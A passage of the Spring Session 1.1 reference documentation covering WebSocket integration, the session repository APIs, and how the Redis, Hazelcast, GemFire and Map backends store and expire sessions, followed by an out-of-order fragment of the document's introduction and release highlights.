this might look like:\n\n[source,xml,indent=0]\n----\ninclude::{docs-test-resources-dir}docs\/http\/HttpSessionListenerXmlTests-context.xml[tags=config]\n----\n\n[[websocket]]\n== WebSocket Integration\n\nSpring Session provides transparent integration with Spring's WebSocket support.\n\ninclude::guides\/websocket.adoc[tags=disclaimer,leveloffset=+1]\n\n[[websocket-why]]\n=== Why Spring Session & WebSockets?\n\nSo why do we need Spring Session when using WebSockets?\n\nConsider an email application that does much of its work through HTTP requests.\nHowever, there is also a chat application embedded within it that works over WebSocket APIs.\nIf a user is actively chatting with someone, we should not timeout the `HttpSession` since this would be pretty poor user experience.\nHowever, this is exactly what https:\/\/java.net\/jira\/browse\/WEBSOCKET_SPEC-175[JSR-356] does.\n\nAnother issue is that according to JSR-356 if the `HttpSession` times out any WebSocket that was created with that HttpSession and an authenticated user should be forcibly closed.\nThis means that if we are actively chatting in our application and are not using the HttpSession, then we will also disconnect from our conversation!\n\n[[websocket-usage]]\n=== WebSocket Usage\n\nThe <<samples, WebSocket Sample>> provides a working sample on how to integrate Spring Session with WebSockets.\nYou can follow the basic steps for integration below, but you are encouraged to follow along with the detailed WebSocket Guide when integrating with your own application:\n\n[[websocket-httpsession]]\n==== HttpSession Integration\n\nBefore using WebSocket integration, you should be sure that you have <<httpsession>> working first.\n\ninclude::guides\/websocket.adoc[tags=config,leveloffset=+2]\n\n[[api]]\n== API Documentation\n\nYou can browse the complete link:..\/..\/api\/[Javadoc] online. The key APIs are described below:\n\n[[api-session]]\n=== Session\n\nA `Session` is a simplified `Map` of name value pairs.\n\nTypical usage might look like the following:\n\n[source,java,indent=0]\n----\ninclude::{indexdoc-tests}[tags=repository-demo]\n----\n\n<1> We create a `SessionRepository` instance with a generic type, `S`, that extends `Session`. The generic type is defined in our class.\n<2> We create a new `Session` using our `SessionRepository` and assign it to a variable of type `S`.\n<3> We interact with the `Session`. In our example, we demonstrate saving a `User` to the `Session`.\n<4> We now save the `Session`. This is why we needed the generic type `S`. The `SessionRepository` only allows saving `Session` instances that were created or retrieved using the same `SessionRepository`. This allows for the `SessionRepository` to make implementation specific optimizations (i.e. only writing attributes that have changed).\n<5> We retrieve the `Session` from the `SessionRepository`.\n<6> We obtain the persisted `User` from our `Session` without the need for explicitly casting our attribute.\n\n[[api-expiringsession]]\n=== ExpiringSession\n\nAn `ExpiringSession` extends a `Session` by providing attributes related to the `Session` instance's expiration.\nIf there is no need to interact with the expiration information, prefer using the more simple `Session` API.\n\nTypical usage might look like the following:\n\n[source,java,indent=0]\n----\ninclude::{indexdoc-tests}[tags=expire-repository-demo]\n----\n\n<1> We create a `SessionRepository` instance with a generic type, `S`, that extends `ExpiringSession`. 
[[api-sessionrepository]]\n=== SessionRepository\n\nA `SessionRepository` is in charge of creating, retrieving, and persisting `Session` instances.\n\nIf possible, developers should not interact directly with a `SessionRepository` or a `Session`.\nInstead, developers should prefer interacting with `SessionRepository` and `Session` indirectly through the <<httpsession,HttpSession>> and <<websocket,WebSocket>> integration.\n\n[[api-findbyindexnamesessionrepository]]\n=== FindByIndexNameSessionRepository\n\nSpring Session's most basic API for using a `Session` is the `SessionRepository`.\nThis API is intentionally very simple, so that it is easy to provide additional implementations with basic functionality.\n\nSome `SessionRepository` implementations may also choose to implement `FindByIndexNameSessionRepository`.\nFor example, Spring's Redis support implements `FindByIndexNameSessionRepository`.\n\nThe `FindByIndexNameSessionRepository` adds a single method to look up all the sessions for a particular user.\nThis is done by ensuring that the session attribute with the name `FindByIndexNameSessionRepository.PRINCIPAL_NAME_INDEX_NAME` is populated with the username.\nIt is the responsibility of the developer to ensure the attribute is populated since Spring Session is not aware of the authentication mechanism being used.\nAn example of how this might be used can be seen below:\n\n[source,java,indent=0]\n----\ninclude::{docs-test-dir}docs\/FindByIndexNameSessionRepositoryTests.java[tags=set-username]\n----\n\n[NOTE]\n====\nSome implementations of `FindByIndexNameSessionRepository` will provide hooks to automatically index other session attributes.\nFor example, many implementations will automatically ensure the current Spring Security user name is indexed with the index name `FindByIndexNameSessionRepository.PRINCIPAL_NAME_INDEX_NAME`.\n====\n\nOnce the session is indexed, it can be found using the following:\n\n[source,java,indent=0]\n----\ninclude::{docs-test-dir}docs\/FindByIndexNameSessionRepositoryTests.java[tags=findby-username]\n----\n\n[[api-enablespringhttpsession]]\n=== EnableSpringHttpSession\n\nThe `@EnableSpringHttpSession` annotation can be added to an `@Configuration` class to expose the `SessionRepositoryFilter` as a bean named \"springSessionRepositoryFilter\".\nIn order to leverage the annotation, a single `SessionRepository` bean must be provided.\nFor example:\n\n[source,java,indent=0]\n----\ninclude::{docs-test-dir}docs\/SpringHttpSessionConfig.java[tags=class]\n----\n\nIt is important to note that no infrastructure for session expirations is configured for you out of the box.\nThis is because things like session expiration are highly implementation dependent.\nThis means that if you require expired sessions to be cleaned up, you are responsible for implementing that cleanup yourself.\n\n
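In addition to the included sample above, a minimal self-contained sketch of such a configuration might look like the following (the class name is hypothetical, and, as just noted, nothing here will ever purge expired sessions):\n\n[source,java]\n----\nimport org.springframework.context.annotation.Bean;\nimport org.springframework.context.annotation.Configuration;\nimport org.springframework.session.MapSessionRepository;\nimport org.springframework.session.config.annotation.web.http.EnableSpringHttpSession;\n\n@Configuration\n@EnableSpringHttpSession\npublic class InMemorySessionConfig {\n\n\t@Bean\n\tpublic MapSessionRepository sessionRepository() {\n\t\t\/\/ in-memory repository; expired sessions are never cleaned up\n\t\treturn new MapSessionRepository();\n\t}\n}\n----\n\n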
[[api-enablehazelcasthttpsession]]\n=== EnableHazelcastHttpSession\n\nIf you wish to use http:\/\/hazelcast.org\/[Hazelcast] as your backing source for the `SessionRepository`, then the `@EnableHazelcastHttpSession` annotation\ncan be added to an `@Configuration` class. This extends the functionality provided by the `@EnableSpringHttpSession` annotation but creates the `SessionRepository`, backed by Hazelcast, for you.\nYou must provide a single `HazelcastInstance` bean for the configuration to work.\nFor example:\n\n[source,java,indent=0]\n----\ninclude::{docs-test-dir}docs\/http\/HazelcastHttpSessionConfig.java[tags=config]\n----\n\nThis will configure Hazelcast in embedded mode with default configuration.\nSee the http:\/\/docs.hazelcast.org\/docs\/latest\/manual\/html-single\/index.html#hazelcast-configuration[Hazelcast documentation] for\ndetailed information on configuration options for Hazelcast.\n\n[[api-enablehazelcasthttpsession-storage]]\n==== Storage Details\n\nSessions will be stored in a distributed `Map` in Hazelcast using a <<api-mapsessionrepository,MapSessionRepository>>.\nThe `Map` interface methods will be used to `get()` and `put()` Sessions.\nThe expiration of a session in the `Map` is handled by Hazelcast's support for setting the time to live on an entry when it is `put()` into the `Map`. Entries (sessions) that have been idle longer than the time to live will be automatically removed from the `Map`.\n\nYou shouldn't need to configure any settings such as `max-idle-seconds` or `time-to-live-seconds` for the `Map` within the Hazelcast configuration.\n\n[[api-enablehazelcasthttpsession-customize]]\n==== Basic Customization\nYou can use the following attributes on `@EnableHazelcastHttpSession` to customize the configuration, as shown in the example after this list:\n\n* **maxInactiveIntervalInSeconds** - the amount of time before the session will expire, in seconds.\nDefault is 1800 seconds (30 minutes).\n* **sessionMapName** - the name of the distributed `Map` that will be used in Hazelcast to store the session data.\n\n
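A sketch combining these attributes (the values shown are illustrative only):\n\n[source,java]\n----\nimport org.springframework.context.annotation.Configuration;\nimport org.springframework.session.hazelcast.config.annotation.web.http.EnableHazelcastHttpSession;\n\n@Configuration\n@EnableHazelcastHttpSession(maxInactiveIntervalInSeconds = 600,\n\t\tsessionMapName = \"spring:session:sessions\")\npublic class HazelcastSessionConfig {\n\t\/\/ a HazelcastInstance bean must still be provided, as shown above\n}\n----\n\n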
[[api-enablehazelcasthttpsession-events]]\n==== Session Events\nA `MapListener` responds to entries being added, evicted, and removed from the distributed `Map`.\nThese events trigger publishing `SessionCreatedEvent`, `SessionExpiredEvent`, and `SessionDeletedEvent` events, respectively, using the `ApplicationEventPublisher`.\n\n[[api-redisoperationssessionrepository]]\n=== RedisOperationsSessionRepository\n\n`RedisOperationsSessionRepository` is a `SessionRepository` that is implemented using Spring Data's `RedisOperations`.\nIn a web environment, this is typically used in combination with `SessionRepositoryFilter`.\nThe implementation supports `SessionDestroyedEvent` and `SessionCreatedEvent` through `SessionMessageListener`.\n\n[[api-redisoperationssessionrepository-new]]\n==== Instantiating a RedisOperationsSessionRepository\n\nA typical example of how to create a new instance can be seen below:\n\n[source,java,indent=0]\n----\ninclude::{indexdoc-tests}[tags=new-redisoperationssessionrepository]\n----\n\nFor additional information on how to create a `RedisConnectionFactory`, refer to the Spring Data Redis Reference.\n\n[[api-redisoperationssessionrepository-config]]\n==== EnableRedisHttpSession\n\nIn a web environment, the simplest way to create a new `RedisOperationsSessionRepository` is to use `@EnableRedisHttpSession`.\nComplete example usage can be found in the <<samples>>.\nYou can use the following attributes to customize the configuration, as shown in the example after this list:\n\n* **maxInactiveIntervalInSeconds** - the amount of time before the session will expire, in seconds\n* **redisNamespace** - allows configuring an application specific namespace for the sessions. Redis keys and channel ids will start with the prefix of `spring:session:<redisNamespace>:`.\n* **redisFlushMode** - allows specifying when data will be written to Redis. The default is only when `save` is invoked on `SessionRepository`.\nA value of `RedisFlushMode.IMMEDIATE` will write to Redis as soon as possible.\n\n
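A sketch combining these attributes (the values shown are illustrative only):\n\n[source,java]\n----\nimport org.springframework.context.annotation.Configuration;\nimport org.springframework.session.data.redis.RedisFlushMode;\nimport org.springframework.session.data.redis.config.annotation.web.http.EnableRedisHttpSession;\n\n@Configuration\n@EnableRedisHttpSession(maxInactiveIntervalInSeconds = 600,\n\t\tredisNamespace = \"myapp\",\n\t\tredisFlushMode = RedisFlushMode.IMMEDIATE)\npublic class RedisSessionConfig {\n\t\/\/ a RedisConnectionFactory bean is still required, as in the samples\n}\n----\n\n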
===== Custom RedisSerializer\n\nYou can customize the serialization by creating a Bean named `springSessionDefaultRedisSerializer` that implements `RedisSerializer<Object>`.\n\n
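For example, the following sketch (assuming Jackson is on the classpath and your Spring Data Redis version provides `GenericJackson2JsonRedisSerializer`) replaces the default JDK serialization with JSON:\n\n[source,java]\n----\nimport org.springframework.context.annotation.Bean;\nimport org.springframework.context.annotation.Configuration;\nimport org.springframework.data.redis.serializer.GenericJackson2JsonRedisSerializer;\nimport org.springframework.data.redis.serializer.RedisSerializer;\n\n@Configuration\npublic class SessionSerializerConfig {\n\n\t@Bean\n\tpublic RedisSerializer<Object> springSessionDefaultRedisSerializer() {\n\t\t\/\/ the bean name must be exactly \"springSessionDefaultRedisSerializer\"\n\t\treturn new GenericJackson2JsonRedisSerializer();\n\t}\n}\n----\n\n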
==== Redis TaskExecutor\n\n`RedisOperationsSessionRepository` is subscribed to receive events from Redis using a `RedisMessageListenerContainer`.\nYou can customize the way those events are dispatched by creating a Bean named `springSessionRedisTaskExecutor` and\/or a Bean named `springSessionRedisSubscriptionExecutor`.\nMore details on configuring Redis task executors can be found http:\/\/docs.spring.io\/spring-data-redis\/docs\/current\/reference\/html\/#redis:pubsub:subscribe:containers[here].\n\n
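A sketch of providing one of these beans (the class name is hypothetical and the pool size is arbitrary; tune it for your application):\n\n[source,java]\n----\nimport org.springframework.context.annotation.Bean;\nimport org.springframework.context.annotation.Configuration;\nimport org.springframework.scheduling.concurrent.ThreadPoolTaskExecutor;\n\n@Configuration\npublic class SessionTaskExecutorConfig {\n\n\t@Bean\n\tpublic ThreadPoolTaskExecutor springSessionRedisTaskExecutor() {\n\t\t\/\/ dispatches messages received by the RedisMessageListenerContainer\n\t\tThreadPoolTaskExecutor executor = new ThreadPoolTaskExecutor();\n\t\texecutor.setCorePoolSize(4);\n\t\treturn executor;\n\t}\n}\n----\n\n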
[[api-redisoperationssessionrepository-storage]]\n==== Storage Details\n\nThe sections below outline how Redis is updated for each operation.\nAn example of creating a new session can be found below.\nThe subsequent sections describe the details.\n\n----\nHMSET spring:session:sessions:33fdd1b6-b496-4b33-9f7d-df96679d32fe creationTime 1404360000000 \\\n\tmaxInactiveInterval 1800 \\\n\tlastAccessedTime 1404360000000 \\\n\tsessionAttr:attrName someAttrValue \\\n\tsessionAttr:attrName2 someAttrValue2\nEXPIRE spring:session:sessions:33fdd1b6-b496-4b33-9f7d-df96679d32fe 2100\nAPPEND spring:session:sessions:expires:33fdd1b6-b496-4b33-9f7d-df96679d32fe \"\"\nEXPIRE spring:session:sessions:expires:33fdd1b6-b496-4b33-9f7d-df96679d32fe 1800\nSADD spring:session:expirations:1439245080000 expires:33fdd1b6-b496-4b33-9f7d-df96679d32fe\nEXPIRE spring:session:expirations:1439245080000 2100\n----\n\n===== Saving a Session\n\nEach session is stored in Redis as a Hash.\nEach session is set and updated using the HMSET command.\nAn example of how each session is stored can be seen below.\n\n----\nHMSET spring:session:sessions:33fdd1b6-b496-4b33-9f7d-df96679d32fe creationTime 1404360000000 \\\n\tmaxInactiveInterval 1800 \\\n\tlastAccessedTime 1404360000000 \\\n\tsessionAttr:attrName someAttrValue \\\n\tsessionAttr:attrName2 someAttrValue2\n----\n\nIn this example, the following statements are true about the session:\n\n* The session id is 33fdd1b6-b496-4b33-9f7d-df96679d32fe.\n* The session was created at 1404360000000, in milliseconds since midnight of 1\/1\/1970 GMT.\n* The session expires in 1800 seconds (30 minutes).\n* The session was last accessed at 1404360000000, in milliseconds since midnight of 1\/1\/1970 GMT.\n* The session has two attributes.\nThe first is \"attrName\" with the value of \"someAttrValue\".\nThe second session attribute is named \"attrName2\" with the value of \"someAttrValue2\".\n\n[[api-redisoperationssessionrepository-writes]]\n===== Optimized Writes\n\nThe `Session` instances managed by `RedisOperationsSessionRepository` keep track of the properties that have changed and only update those.\nThis means if an attribute is written once and read many times, we only need to write that attribute once.\nFor example, assume the session attribute \"attrName2\" from earlier was updated.\nThe following would be executed upon saving:\n\n----\nHMSET spring:session:sessions:33fdd1b6-b496-4b33-9f7d-df96679d32fe sessionAttr:attrName2 newValue\n----\n\n[[api-redisoperationssessionrepository-expiration]]\n===== Session Expiration\n\nAn expiration is associated with each session using the EXPIRE command, based upon the `ExpiringSession.getMaxInactiveInterval()`.\nFor example:\n\n----\nEXPIRE spring:session:sessions:33fdd1b6-b496-4b33-9f7d-df96679d32fe 2100\n----\n\nYou will note that the expiration is set 5 minutes after the session actually expires.\nThis is necessary so that the value of the session can still be accessed for any necessary processing (such as firing destruction events) after the session has expired; the key itself is cleaned up five minutes later.\n\n[NOTE]\n====\nThe `SessionRepository.getSession(String)` method ensures that no expired sessions will be returned.\nThis means there is no need to check the expiration before using a session.\n====\n\nSpring Session relies on the delete and expired http:\/\/redis.io\/topics\/notifications[keyspace notifications] from Redis to fire a <<api-redisoperationssessionrepository-sessiondestroyedevent,SessionDeletedEvent>> and <<api-redisoperationssessionrepository-sessiondestroyedevent,SessionExpiredEvent>> respectively.\nIt is the `SessionDeletedEvent` or `SessionExpiredEvent` that ensures resources associated with the Session are cleaned up.\nFor example, when using Spring Session's WebSocket support, the Redis expired or delete event is what triggers any WebSocket connections associated with the session to be closed.\n\nExpiration is not tracked directly on the session key itself, since this would mean the session data would no longer be available. Instead a special session expires key is used. In our example the expires key is:\n\n----\nAPPEND spring:session:sessions:expires:33fdd1b6-b496-4b33-9f7d-df96679d32fe \"\"\nEXPIRE spring:session:sessions:expires:33fdd1b6-b496-4b33-9f7d-df96679d32fe 1800\n----\n\nWhen a session expires key is deleted or expires, the keyspace notification triggers a lookup of the actual session and a `SessionDestroyedEvent` is fired.\n\nOne problem with relying on Redis expiration exclusively is that Redis makes no guarantee of when the expired event will be fired if the key has not been accessed.\nSpecifically, the background task that Redis uses to clean up expired keys is a low priority task and may not trigger the key expiration.\nFor additional details see the http:\/\/redis.io\/topics\/notifications[Timing of expired events] section in the Redis documentation.\n\nTo circumvent the fact that expired events are not guaranteed to happen, we can ensure that each key is accessed when it is expected to expire.\nThis means that if the TTL is expired on the key, Redis will remove the key and fire the expired event when we try to access the key.\n\nFor this reason, each session expiration is also tracked to the nearest minute.\nThis allows a background task to access the potentially expired sessions to ensure that Redis expired events are fired in a more deterministic fashion.\nFor example:\n\n----\nSADD spring:session:expirations:1439245080000 expires:33fdd1b6-b496-4b33-9f7d-df96679d32fe\nEXPIRE spring:session:expirations:1439245080000 2100\n----\n\nThe background task will then use these mappings to explicitly request each key.\nBy accessing the key, rather than deleting it, we ensure that Redis deletes the key for us only if the TTL is expired.\n\n[NOTE]\n====\nWe do not explicitly delete the keys since in some instances there may be a race condition that incorrectly identifies a key as expired when it is not.\nShort of using distributed locks (which would kill our performance) there is no way to ensure the consistency of the expiration mapping.\nBy simply accessing the key, we ensure that the key is only removed if the TTL on that key is expired.\n====\n\n[[api-redisoperationssessionrepository-sessiondestroyedevent]]\n==== SessionDeletedEvent and SessionExpiredEvent\n\n`SessionDeletedEvent` and `SessionExpiredEvent` are both types of `SessionDestroyedEvent`.\n\n`RedisOperationsSessionRepository` supports firing a `SessionDeletedEvent` whenever a `Session` is deleted or a `SessionExpiredEvent` when it expires.\nThis is necessary to ensure resources associated with the `Session` are properly cleaned up.\n\nFor example, when integrating with WebSockets, the `SessionDestroyedEvent` is in charge of closing any active WebSocket connections.\n\n
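Applications can observe these events with a standard Spring `ApplicationListener`.\nThe following is a minimal sketch; the listener class name is hypothetical, and the `getId()` accessor is assumed here (consult the Javadoc of the Spring Session version you are using):\n\n[source,java]\n----\nimport org.springframework.context.ApplicationListener;\nimport org.springframework.session.events.SessionDestroyedEvent;\nimport org.springframework.stereotype.Component;\n\n@Component\npublic class SessionDestroyedListener implements ApplicationListener<SessionDestroyedEvent> {\n\n\t@Override\n\tpublic void onApplicationEvent(SessionDestroyedEvent event) {\n\t\t\/\/ release any application resources tied to this session id\n\t\tString sessionId = event.getId();\n\t\t\/\/ ...\n\t}\n}\n----\n\n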
Firing `SessionDeletedEvent` or `SessionExpiredEvent` is made available through the `SessionMessageListener`, which listens to http:\/\/redis.io\/topics\/notifications[Redis Keyspace events].\nIn order for this to work, Redis Keyspace events for Generic commands and Expired events need to be enabled.\nFor example:\n\n[source,bash]\n----\nredis-cli config set notify-keyspace-events Egx\n----\n\nIf you are using `@EnableRedisHttpSession`, registering the `SessionMessageListener` and enabling the necessary Redis Keyspace events is done automatically.\nHowever, in a secured Redis environment the config command is disabled.\nThis means that Spring Session cannot configure Redis Keyspace events for you.\nTo disable the automatic configuration add `ConfigureRedisAction.NO_OP` as a bean.\n\nFor example, Java configuration can use the following:\n\n[source,java,indent=0]\n----\ninclude::{docs-test-dir}docs\/RedisHttpSessionConfigurationNoOpConfigureRedisActionTests.java[tags=configure-redis-action]\n----\n\nXML configuration can use the following:\n\n[source,xml,indent=0]\n----\ninclude::{docs-test-resources-dir}docs\/HttpSessionConfigurationNoOpConfigureRedisActionXmlTests-context.xml[tags=configure-redis-action]\n----\n\n[[api-redisoperationssessionrepository-sessioncreatedevent]]\n==== SessionCreatedEvent\n\nWhen a session is created, an event is sent to Redis with a channel of `spring:session:channel:created:33fdd1b6-b496-4b33-9f7d-df96679d32fe`,\nwhere `33fdd1b6-b496-4b33-9f7d-df96679d32fe` is the session id.\nThe body of the event will be the session that was created.\n\nIf registered as a `MessageListener` (the default), `RedisOperationsSessionRepository` will translate the Redis message into a `SessionCreatedEvent`.\n\n[[api-redisoperationssessionrepository-cli]]\n==== Viewing the Session in Redis\n\nAfter http:\/\/redis.io\/topics\/quickstart[installing redis-cli], you can inspect the values in Redis http:\/\/redis.io\/commands#hash[using the redis-cli].\nFor example, enter the following into a terminal:\n\n[source,bash]\n----\n$ redis-cli\nredis 127.0.0.1:6379> keys *\n1) \"spring:session:sessions:4fc39ce3-63b3-4e17-b1c4-5e1ed96fb021\" <1>\n2) \"spring:session:expirations:1418772300000\" <2>\n----\n\n<1> The suffix of this key is the session identifier of the Spring Session.\n<2> This key contains all the session ids that should be deleted at the time `1418772300000`.\n\nYou can also view the attributes of each session.\n\n[source,bash]\n----\nredis 127.0.0.1:6379> hkeys spring:session:sessions:4fc39ce3-63b3-4e17-b1c4-5e1ed96fb021\n1) \"lastAccessedTime\"\n2) \"creationTime\"\n3) \"maxInactiveInterval\"\n4) \"sessionAttr:username\"\nredis 127.0.0.1:6379> hget spring:session:sessions:4fc39ce3-63b3-4e17-b1c4-5e1ed96fb021 sessionAttr:username\n\"\\xac\\xed\\x00\\x05t\\x00\\x03rob\"\n----\n\n
[[api-gemfireoperationssessionrepository]]\n=== GemFireOperationsSessionRepository\n\n`GemFireOperationsSessionRepository` is a `SessionRepository` that is implemented using Spring Data GemFire.\nIn a web environment, this is typically used in combination with `SessionRepositoryFilter`.\nThe implementation supports `SessionDestroyedEvent` and `SessionCreatedEvent` through `SessionMessageListener`.\n\n[[api-gemfireoperationssessionrepository-indexing]]\n==== Using Indexes with GemFire\n\nWhile best practices concerning the proper definition of indexes that positively impact GemFire's performance are beyond\nthe scope of this document, it is important to realize that Spring Session Data GemFire creates and uses indexes to\nquery and find Sessions efficiently.\n\nOut-of-the-box, Spring Session Data GemFire creates one Hash-typed Index on the principal name. There are two different built-in\nstrategies for finding the principal name. The first strategy is that the value of the session attribute with the name\n`FindByIndexNameSessionRepository.PRINCIPAL_NAME_INDEX_NAME` will be indexed to the same index name. For example:\n\n[source,java,indent=0]\n----\ninclude::{docs-itest-dir}docs\/http\/HttpSessionGemFireIndexingITests.java[tags=findbyindexname-set]\ninclude::{docs-itest-dir}docs\/http\/HttpSessionGemFireIndexingITests.java[tags=findbyindexname-get]\n----\n\n[[api-gemfireoperationssessionrepository-indexing-security]]\n==== Using Indexes with GemFire & Spring Security\n\nAlternatively, Spring Session Data GemFire will map Spring Security's current `Authentication#getName()` to the index\n`FindByIndexNameSessionRepository.PRINCIPAL_NAME_INDEX_NAME`. For example, if you are using Spring Security you can\nfind the current user's sessions using:\n\n[source,java,indent=0]\n----\ninclude::{docs-itest-dir}docs\/http\/HttpSessionGemFireIndexingITests.java[tags=findbyspringsecurityindexname-context]\ninclude::{docs-itest-dir}docs\/http\/HttpSessionGemFireIndexingITests.java[tags=findbyspringsecurityindexname-get]\n----\n\n[[api-gemfireoperationssessionrepository-indexing-custom]]\n==== Using Custom Indexes with GemFire\n\nIndexing the principal name enables developers using the `GemFireOperationsSessionRepository` to programmatically query and find all Sessions\nwith a given principal name efficiently.\n\nAdditionally, Spring Session Data GemFire will create a Range-based Index on the implementing Session's Map-type\n`attributes` property (i.e. on any arbitrary Session attribute) when a developer identifies one or more named Session\nattributes that should be indexed by GemFire.\n\nSession attributes to index can be specified with the `indexableSessionAttributes` attribute on the `@EnableGemFireHttpSession`\nannotation. A developer adds this annotation to their Spring application `@Configuration` class when they wish to\nenable Spring Session support for HttpSession backed by GemFire.\n\nFor example, the following configuration:\n\n[source,java,indent=0]\n----\ninclude::{docs-itest-dir}docs\/http\/gemfire\/indexablesessionattributes\/GemFireHttpSessionConfig.java[tags=class-start]\n\t\/\/ ...\n}\n----\n\nwill allow searching for sessions using the following:\n\n[source,java,indent=0]\n----\ninclude::{docs-itest-dir}docs\/http\/gemfire\/indexablesessionattributes\/HttpSessionGemFireIndexingCustomITests.java[tags=findbyindexname-set]\ninclude::{docs-itest-dir}docs\/http\/gemfire\/indexablesessionattributes\/HttpSessionGemFireIndexingCustomITests.java[tags=findbyindexname-get]\n----\n\nNOTE: Only Session attribute names identified in the `@EnableGemFireHttpSession` annotation's `indexableSessionAttributes`\nattribute will have an Index defined. All other Session attributes will not be indexed.\n\nHowever, there is one caveat. Any values stored in indexable Session attributes must implement the `java.lang.Comparable<T>`\ninterface. If those object values do not implement `Comparable`, then GemFire will throw an error on startup when the\nIndex is defined for Regions with persistent Session data, or when an attempt is made at runtime to assign the indexable\nSession attribute a value that is not `Comparable` and the Session is saved to GemFire.\n\nNOTE: Any Session attribute that is not indexed may store non-`Comparable` values.\n\nTo learn more about GemFire's Range-based Indexes, see http:\/\/gemfire.docs.pivotal.io\/docs-gemfire\/latest\/developing\/query_index\/creating_map_indexes.html[Creating Indexes on Map Fields].\n\nTo learn more about GemFire Indexing in general, see http:\/\/gemfire.docs.pivotal.io\/docs-gemfire\/latest\/developing\/query_index\/query_index.html[Working with Indexes].\n\n[[api-mapsessionrepository]]\n=== MapSessionRepository\n\nThe `MapSessionRepository` allows for persisting `ExpiringSession` in a `Map`, with the key being the `ExpiringSession` id and the value being the `ExpiringSession`.\nThe implementation can be used with a `ConcurrentHashMap` as a testing or convenience mechanism.\nAlternatively, it can be used with distributed `Map` implementations. For example, it can be used with Hazelcast, as sketched below.\n\n
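A minimal sketch of backing a `MapSessionRepository` with a Hazelcast `IMap` (the factory class, map name, and embedded instance here are illustrative; the <<samples,Hazelcast Sample>> shows a complete setup):\n\n[source,java]\n----\nimport java.util.Map;\n\nimport com.hazelcast.core.Hazelcast;\nimport com.hazelcast.core.HazelcastInstance;\n\nimport org.springframework.session.ExpiringSession;\nimport org.springframework.session.MapSessionRepository;\n\npublic class HazelcastSessionRepositoryFactory {\n\n\tpublic static MapSessionRepository createRepository() {\n\t\t\/\/ an embedded Hazelcast instance; production setups usually configure this explicitly\n\t\tHazelcastInstance hazelcast = Hazelcast.newHazelcastInstance();\n\t\tMap<String, ExpiringSession> sessions = hazelcast.getMap(\"spring:session:sessions\");\n\t\treturn new MapSessionRepository(sessions);\n\t}\n}\n----\n\n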
[[api-mapsessionrepository-new]]\n==== Instantiating MapSessionRepository\n\nCreating a new instance is as simple as:\n\n[source,java,indent=0]\n----\ninclude::{indexdoc-tests}[tags=new-mapsessionrepository]\n----\n\n[[api-mapsessionrepository-hazelcast]]\n==== Using Spring Session and Hazelcast\n\nThe <<samples,Hazelcast Sample>> is a complete application demonstrating using Spring Session with Hazelcast.\n\nTo run it use the following:\n\n\t.\/gradlew :samples:hazelcast:tomcatRun\n\nThe <<samples,Hazelcast Spring Sample>> is a complete application demonstrating using Spring Session with Hazelcast and Spring Security.\n\nIt includes example Hazelcast `MapListener` implementations that support firing `SessionCreatedEvent`, `SessionDeletedEvent` and `SessionExpiredEvent`.\n\nTo run it use the following:\n\n\t.\/gradlew :samples:hazelcast-spring:tomcatRun\n\n[[community]]\n== Spring Session Community\n\nWe are glad to consider you a part of our community.\nPlease find additional information below.\n\n[[community-support]]\n=== Support\n\nYou can get help by asking questions on http:\/\/stackoverflow.com\/questions\/tagged\/spring-session[StackOverflow with the tag spring-session].\nSimilarly, we encourage helping others by answering questions on StackOverflow.\n\n[[community-source]]\n=== Source Code\n\nOur source code can be found on GitHub at https:\/\/github.com\/spring-projects\/spring-session\/\n\n[[community-issues]]\n=== Issue Tracking\n\nWe track issues in GitHub issues at https:\/\/github.com\/spring-projects\/spring-session\/issues\n\n[[community-contributing]]\n=== Contributing\n\nWe appreciate https:\/\/help.github.com\/articles\/using-pull-requests\/[Pull Requests].\n\n[[community-license]]\n=== License\n\nSpring Session is Open Source software released under the http:\/\/www.apache.org\/licenses\/LICENSE-2.0.html[Apache 2.0 license].\n\n[[minimum-requirements]]\n== Minimum Requirements\n\nThe minimum requirements for Spring Session are:\n\n* Java 5+\n* If you are running in a Servlet Container (not required), Servlet 2.5+\n* If you are using other Spring libraries (not required), the minimum required version is Spring 3.2.14.\nWhile we re-run all unit tests against Spring 3.2.x, we recommend using the latest Spring 4.x version when possible.\n* `@EnableRedisHttpSession` requires Redis 2.8+. This is necessary to support <<api-redisoperationssessionrepository-expiration,Session Expiration>>.\n\n[NOTE]\n====\nAt its core Spring Session only has a required dependency on commons-logging.\nFor an example of using Spring Session without any other Spring dependencies, refer to the <<samples,hazelcast sample>> application.\n====\n"
Tomcat) neutral way.\nAdditional features include:\n** **Clustered Sessions** - Spring Session makes it trivial to support <<httpsession-redis,clustered sessions>> without being tied to an application container specific solution.\n** **Multiple Browser Sessions** - Spring Session supports <<httpsession-multi,managing multiple users' sessions>> in a single browser instance (i.e. multiple authenticated accounts similar to Google).\n** **RESTful APIs** - Spring Session allows providing session ids in headers to work with <<httpsession-rest,RESTful APIs>>\n\n* <<websocket,WebSocket>> - provides the ability to keep the `HttpSession` alive when receiving WebSocket messages\n\n== What's New in 1.1\n\nBelow are the highlights of what is new in Spring Session 1.1. You can find a complete list of what's new in https:\/\/github.com\/spring-projects\/spring-session\/issues?utf8=%E2%9C%93&q=milestone%3A%221.1.0+M1%22[1.1.0 M1] and https:\/\/github.com\/spring-projects\/spring-session\/issues?utf8=%E2%9C%93&q=milestone%3A%221.1.0+RC1%22[1.1.0 RC1] by referring to the changelog.\n\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/148[#148] - Added <<httpsession-gemfire,GemFire Support>>\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/7[#7] - link:guides\/findbyusername.html[Query by Username]\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/299[#299] - link:guides\/custom-cookie.html[Customize Cookie Creation]\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/4[#4] - Add <<httpsession-httpsessionlistener,HttpSessionListener>> support\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/283[#283] - Allow override default `RedisSerializer`\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/277[#277] - Added link:guides\/hazelcast-spring.html[@EnableHazelcastHttpSession]\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/271[#271] - Performance improvements\n* https:\/\/github.com\/spring-projects\/spring-session\/pull\/218[#218] - Allow scoping the session in Redis using <<api-redisoperationssessionrepository-config,redisNamespace>>\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/273[#273] - Allow writing to Redis immediately (instead of lazily) using <<api-redisoperationssessionrepository-config,redisFlushMode>>\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/272[#272] - Add `ExpiringSession.setLastAccessedTime(long)`\n* https:\/\/github.com\/spring-projects\/spring-session\/pull\/349[#349] - Added https:\/\/gitter.im\/spring-projects\/spring-session[Gitter Room] for 